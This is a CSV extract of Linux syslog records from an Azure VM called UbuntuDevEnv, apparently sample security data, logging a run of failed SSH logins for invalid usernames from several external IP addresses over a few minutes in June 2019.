+17266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:33,UbuntuDevEnv,2019-06-26 08:54:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:34,UbuntuDevEnv,2019-06-26 08:54:34,auth,UbuntuDevEnv,info,Failed password for invalid user gtasa from 143.0.52.117 port 53055 ssh2,63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gtasa,143.0.52.1,53055,,
+17268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:34,UbuntuDevEnv,2019-06-26 08:54:34,auth,UbuntuDevEnv,info,Disconnected from invalid user gtasa 143.0.52.117 port 53055 [preauth],63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gtasa,143.0.52.1,53055,,
+17269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:34,UbuntuDevEnv,2019-06-26 08:54:34,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 53055:11: Bye Bye [preauth],63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,53055,,
+17270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:21,UbuntuDevEnv,2019-06-26 08:55:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:21,UbuntuDevEnv,2019-06-26 08:55:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:21,UbuntuDevEnv,2019-06-26 08:55:21,auth,UbuntuDevEnv,info,Invalid user filer from 183.47.14.74 port 42057,63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filer,183.47.14.7,42057,,
+17273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:23,UbuntuDevEnv,2019-06-26 08:55:23,auth,UbuntuDevEnv,info,Failed password for invalid user filer from 183.47.14.74 port 42057 ssh2,63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filer,183.47.14.7,42057,,
+17274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:24,UbuntuDevEnv,2019-06-26 08:55:23,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 42057:11: Bye Bye [preauth],63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,42057,,
+17275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:55:24,UbuntuDevEnv,2019-06-26 08:55:23,auth,UbuntuDevEnv,info,Disconnected from invalid user filer 183.47.14.74 port 42057 [preauth],63184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filer,183.47.14.7,42057,,
+17276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:00,UbuntuDevEnv,2019-06-26 08:56:00,auth,UbuntuDevEnv,info,Invalid user tuo from 185.103.243.78 port 40386,63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tuo,185.103.243.7,40386,,
+17277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:00,UbuntuDevEnv,2019-06-26 08:56:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:00,UbuntuDevEnv,2019-06-26 08:56:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:02,UbuntuDevEnv,2019-06-26 08:56:02,auth,UbuntuDevEnv,info,Failed password for invalid user tuo from 185.103.243.78 port 40386 ssh2,63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tuo,185.103.243.7,40386,,
+17280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:02,UbuntuDevEnv,2019-06-26 08:56:02,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 40386:11: Bye Bye [preauth],63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,40386,,
+17281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:02,UbuntuDevEnv,2019-06-26 08:56:02,auth,UbuntuDevEnv,info,Disconnected from invalid user tuo 185.103.243.78 port 40386 [preauth],63334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tuo,185.103.243.7,40386,,
+17282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:26,UbuntuDevEnv,2019-06-26 08:56:25,auth,UbuntuDevEnv,info,Invalid user siteadmin from 143.0.52.117 port 33364,63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siteadmin,143.0.52.1,33364,,
+17283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:26,UbuntuDevEnv,2019-06-26 08:56:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:26,UbuntuDevEnv,2019-06-26 08:56:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:27,UbuntuDevEnv,2019-06-26 08:56:27,auth,UbuntuDevEnv,info,Failed password for invalid user siteadmin from 143.0.52.117 port 33364 ssh2,63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siteadmin,143.0.52.1,33364,,
+17286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:28,UbuntuDevEnv,2019-06-26 08:56:27,auth,UbuntuDevEnv,info,Disconnected from invalid user siteadmin 143.0.52.117 port 33364 [preauth],63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siteadmin,143.0.52.1,33364,,
+17287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:56:28,UbuntuDevEnv,2019-06-26 08:56:27,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 33364:11: Bye Bye [preauth],63438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,33364,,
+17288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:08,UbuntuDevEnv,2019-06-26 08:57:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:08,UbuntuDevEnv,2019-06-26 08:57:07,auth,UbuntuDevEnv,info,Invalid user ba from 183.47.14.74 port 50004,63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,183.47.14.7,50004,,
+17290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:08,UbuntuDevEnv,2019-06-26 08:57:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:09,UbuntuDevEnv,2019-06-26 08:57:09,auth,UbuntuDevEnv,info,Failed password for invalid user ba from 183.47.14.74 port 50004 ssh2,63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,183.47.14.7,50004,,
+17292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:10,UbuntuDevEnv,2019-06-26 08:57:09,auth,UbuntuDevEnv,info,Disconnected from invalid user ba 183.47.14.74 port 50004 [preauth],63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,183.47.14.7,50004,,
+17293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:10,UbuntuDevEnv,2019-06-26 08:57:09,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 50004:11: Bye Bye [preauth],63582,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,50004,,
+17294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:42,UbuntuDevEnv,2019-06-26 08:57:41,auth,UbuntuDevEnv,info,Invalid user www from 185.103.243.78 port 55984,63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,185.103.243.7,55984,,
+17295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:42,UbuntuDevEnv,2019-06-26 08:57:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:42,UbuntuDevEnv,2019-06-26 08:57:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:44,UbuntuDevEnv,2019-06-26 08:57:44,auth,UbuntuDevEnv,info,Failed password for invalid user www from 185.103.243.78 port 55984 ssh2,63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,185.103.243.7,55984,,
+17298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:44,UbuntuDevEnv,2019-06-26 08:57:44,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 55984:11: Bye Bye [preauth],63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,55984,,
+17299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:57:44,UbuntuDevEnv,2019-06-26 08:57:44,auth,UbuntuDevEnv,info,Disconnected from invalid user www 185.103.243.78 port 55984 [preauth],63706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,185.103.243.7,55984,,
+17300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:19,UbuntuDevEnv,2019-06-26 08:58:19,auth,UbuntuDevEnv,info,Invalid user mapr from 143.0.52.117 port 41905,63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mapr,143.0.52.1,41905,,
+17301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:19,UbuntuDevEnv,2019-06-26 08:58:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:19,UbuntuDevEnv,2019-06-26 08:58:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:21,UbuntuDevEnv,2019-06-26 08:58:21,auth,UbuntuDevEnv,info,Failed password for invalid user mapr from 143.0.52.117 port 41905 ssh2,63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mapr,143.0.52.1,41905,,
+17304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:21,UbuntuDevEnv,2019-06-26 08:58:21,auth,UbuntuDevEnv,info,Disconnected from invalid user mapr 143.0.52.117 port 41905 [preauth],63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mapr,143.0.52.1,41905,,
+17305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:58:21,UbuntuDevEnv,2019-06-26 08:58:21,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 41905:11: Bye Bye [preauth],63842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,41905,,
+17306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:06,UbuntuDevEnv,2019-06-26 08:59:05,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 57951 [preauth],63994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,57951,,
+17307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:23,UbuntuDevEnv,2019-06-26 08:59:23,auth,UbuntuDevEnv,info,Invalid user acitoolkit from 185.103.243.78 port 43350,64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acitoolkit,185.103.243.7,43350,,
+17308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:23,UbuntuDevEnv,2019-06-26 08:59:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:23,UbuntuDevEnv,2019-06-26 08:59:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:25,UbuntuDevEnv,2019-06-26 08:59:24,auth,UbuntuDevEnv,info,Failed password for invalid user acitoolkit from 185.103.243.78 port 43350 ssh2,64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acitoolkit,185.103.243.7,43350,,
+17311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:25,UbuntuDevEnv,2019-06-26 08:59:24,auth,UbuntuDevEnv,info,Disconnected from invalid user acitoolkit 185.103.243.78 port 43350 [preauth],64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acitoolkit,185.103.243.7,43350,,
+17312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:25,UbuntuDevEnv,2019-06-26 08:59:24,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 43350:11: Bye Bye [preauth],64063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,43350,,
+17313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:57,UbuntuDevEnv,2019-06-26 08:59:57,auth,UbuntuDevEnv,info,Invalid user plaunoff from 45.55.190.46 port 60552,64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,45.55.190.4,60552,,
+17314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:57,UbuntuDevEnv,2019-06-26 08:59:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:57,UbuntuDevEnv,2019-06-26 08:59:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:59:59,UbuntuDevEnv,2019-06-26 08:59:59,auth,UbuntuDevEnv,info,Failed password for invalid user plaunoff from 45.55.190.46 port 60552 ssh2,64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,45.55.190.4,60552,,
+17317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:00,UbuntuDevEnv,2019-06-26 08:59:59,auth,UbuntuDevEnv,info,Disconnected from invalid user plaunoff 45.55.190.46 port 60552 [preauth],64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plaunoff,45.55.190.4,60552,,
+17318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:00,UbuntuDevEnv,2019-06-26 08:59:59,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 60552:11: Bye Bye [preauth],64149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,60552,,
+17319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:11,UbuntuDevEnv,2019-06-26 09:00:11,auth,UbuntuDevEnv,info,Invalid user nagios from 143.0.52.117 port 50448,64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,143.0.52.1,50448,,
+17320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:12,UbuntuDevEnv,2019-06-26 09:00:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:12,UbuntuDevEnv,2019-06-26 09:00:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:14,UbuntuDevEnv,2019-06-26 09:00:13,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 143.0.52.117 port 50448 ssh2,64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,143.0.52.1,50448,,
+17323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:14,UbuntuDevEnv,2019-06-26 09:00:13,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 50448:11: Bye Bye [preauth],64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,50448,,
+17324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:14,UbuntuDevEnv,2019-06-26 09:00:13,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 143.0.52.117 port 50448 [preauth],64268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,143.0.52.1,50448,,
+17325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:56,UbuntuDevEnv,2019-06-26 09:00:56,auth,UbuntuDevEnv,info,Invalid user user from 183.47.14.74 port 37664,64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,183.47.14.7,37664,,
